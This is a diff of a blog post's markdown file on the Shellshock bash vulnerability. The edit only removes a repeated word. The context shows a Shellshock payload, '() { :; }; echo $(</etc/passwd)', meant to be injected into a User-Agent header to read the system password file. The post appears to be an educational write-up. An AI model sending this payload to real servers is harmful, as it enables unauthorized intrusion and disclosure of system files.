A3h1nt/a3h1nt.github.io/_posts/2024-11-12-Shellshock-Diving-Deep-Into-The-Shock.md

 ## Sending The Shock

-Using the same old bash script that we are running, this time let's inject inject something interesting into the user agent header.
+Using the same old bash script that we are running, this time let's inject something interesting into the user agent header.

 ```bash
 () { :; }; echo $(</etc/passwd)